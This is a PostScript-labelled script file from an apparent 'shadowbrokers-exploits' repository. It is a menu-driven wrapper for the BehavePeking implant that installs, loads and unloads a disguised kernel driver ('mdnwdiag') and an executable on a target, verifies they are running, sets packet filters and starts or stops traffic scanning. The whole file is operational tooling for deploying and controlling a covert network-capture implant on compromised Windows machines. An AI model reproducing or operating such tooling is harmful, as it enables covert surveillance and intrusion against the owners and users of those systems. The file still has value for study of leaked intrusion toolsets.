shadowbrokers-exploits/windows/Resources/Ep/Scripts/BehavePeking.eps

293 lines
6.4 KiB
PostScript
Raw Permalink Normal View History

#--------------------------------------------------------
# File: BehavePeking.eps
#
# Wrapper script for BehavePeking tools
#
# Modifications:
# 29 Aug 2005 Created.
#--------------------------------------------------------
@echo off;
# defaults
string $driverName = "mdnwdiag";
string $localExe = "";
string $version = "BehavePeking 1.0.2";
# commands
int $installCmdsStart = 1;
int $normalCmdsStart = 15;
int $controlCmdsStart = 20;
string $commands;
$commands[0] = "Quit";
# start of "install" commands
$commands[1] = "Change driver name";
$commands[2] = "Set exe location";
$commands[3] = "Full install of tools";
$commands[4] = "Full uninstall of tools";
$commands[5] = "Install driver";
$commands[6] = "Uninstall driver";
$commands[7] = "Install exe";
$commands[8] = "Uninstall exe";
$commands[9] = "Load driver";
$commands[10] = "Unload driver";
$commands[11] = "Start exe";
$commands[12] = "Stop exe";
$commands[13] = "Verify install";
$commands[14] = "Verify tools are running";
# start of "config" commands
$commands[15] = "Get driver status";
$commands[16] = "Get exe status";
$commands[17] = "Get packet filter";
$commands[18] = "Set packet filter";
$commands[19] = "Configure Executable";
# start of "control" commands
$commands[20] = "Stop scanning";
$commands[21] = "Start scanning";
while (true) {
echo "\r\n\r\n";
echo "$version\r\n";
# Print the current configuration
echo "Current Configuration:";
echo "\t Driver Name : $driverName";
echo "\t Local Exe : $localExe";
echo "";
# print the command list
int $i=0;
while ($i < sizeof($commands)) {
if ($i == $installCmdsStart) {
echo "";
echo "Installation commands:";
} else if ($i == $normalCmdsStart) {
echo "";
echo "Configuration commands";
} else if ($i == $controlCmdsStart) {
echo "";
echo "Control commands:";
}
echo "($i). $commands[$i]";
$i++;
}
echo "";
int $choice = GetInput("Enter the desired option");
if ($choice == 0) {
# quit
return true;
} else if ($choice == 1) {
# Change driver name
echo "Current driver name = '$driverName'";
$driverName = GetInput("Enter new driver name");
} else if ($choice == 2) {
# Change the exe location
echo "Current local exe location = '$localExe'";
$localExe = GetInput("Enter new local exe location");
} else if ($choice == 3) {
# full install
@record on;
if (`script BehavePeking\\FullInstall.eps $driverName "$localExe"`) {
echo "INSTALL SUCCESS";
$localExe = GetCmdData("file");
} else {
echo "**** INSTALL FAILED ****";
}
@record off;
} else if ($choice == 4) {
# full uninstall
if (`script BehavePeking\\FullUninstall.eps $driverName`) {
echo "UNINSTALL SUCCESS";
} else {
echo "**** UNINSTALL FAILED ****";
}
} else if ($choice == 5) {
# install driver
if (`script BehavePeking\\InstallDriver.eps $driverName`) {
echo "INSTALL SUCCESS";
echo "";
echo "NOTE: The driver has not been loaded";
} else {
echo "**** INSTALL FAILED ****";
}
} else if ($choice == 6) {
# uinstall driver
if (`script BehavePeking\\UninstallDriver.eps $driverName`) {
echo "UNINSTALL SUCCESS";
} else {
echo "**** UNINSTALL FAILED ****";
}
} else if ($choice == 7) {
# install exe
if ((defined($localExe) == false) || (strlen($localExe) == 0)) {
echo "";
echo "Executable must be configured prior to installation";
} else {
if (`dp_install "$localExe"`) {
echo "INSTALL SUCCESS";
echo "";
if (`dp_load`) {
echo "EXE LOADED";
} else {
echo "NOTE: The exe has not been loaded";
}
} else {
echo "**** INSTALL FAILED ****";
}
}
} else if ($choice == 8) {
# uinstall exe
if (`dp_uninstall`) {
echo "UNINSTALL SUCCESS";
} else {
echo "**** UNINSTALL FAILED ****";
}
} else if ($choice == 9) {
# load the driver
if (prompt "Load the driver ($driverName)?") {
@echo on;
`driverload -name $driverName`;
@echo off;
}
} else if ($choice == 10) {
# unload the driver
if (prompt "Unload the driver ($driverName)?") {
@echo on;
`driverunload -name $driverName`;
@echo off;
}
} else if ($choice == 11) {
# start the exe
@echo on;
`dp_load`;
@echo off;
} else if ($choice == 12) {
# unload the driver
@echo on;
`dp_unload`;
@echo off;
} else if ($choice == 13) {
# verify install
if (`script BehavePeking\\VerifyInstall.eps $driverName`) {
echo "VERIFICATION SUCCESSFUL";
} else {
echo "**** UNABLE TO VERIFY INSTALL ****";
}
} else if ($choice == 14) {
# verify install
if (`script BehavePeking\\VerifyRunning.eps $driverName`) {
echo "VERIFICATION SUCCESSFUL";
} else {
echo "**** UNABLE TO VERIFY DRIVER IS RUNNING ****";
}
### CONFIG COMMANDS ###
} else if ($choice == 15) {
# get the driverstatus
`script BehavePeking\\GetStatus.eps $driverName`;
} else if ($choice == 16) {
# get the driverstatus
@echo on;
`dp_status`;
@echo off;
} else if ($choice == 17) {
# get the current filter
@echo on;
`webtipper -name $driverName -get`;
@echo off;
} else if ($choice == 18) {
# set the current filter
if (`script BehavePeking\\SetFilter.eps $driverName`) {
echo "SET OF FILTER SUCCESSFUL";
echo "";
echo "NOTE: Packet capturing has been STOPPED";
} else {
echo "**** UNABLE TO SET NEW FILTER ****";
echo "";
echo "NOTE: The driver must be started before a filter may be set";
}
} else if ($choice == 19) {
# set the current filter
@record on;
if (`script BehavePeking\\ConfigureExe.eps`) {
echo "CONFIGURE OF EXECUTABLE SUCCESSFUL";
$localExe = GetCmdData("file");
} else {
echo "**** FAILED TO CONFIGURE EXECUTABLE ****";
}
@record off;
### CONFIG COMMANDS ###
### CONTROL COMMANDS ###
} else if ($choice == 20) {
# stop scanning
@echo on;
`webtipper -name $driverName -control stop`;
@echo off;
} else if ($choice == 21) {
# start scanning
@echo on;
`webtipper -name $driverName -control start`;
@echo off;
### CONTROL COMMANDS ###
} else {
# invalid choice
echo "*** Invalid choice ***";
}
pause;
}
return true;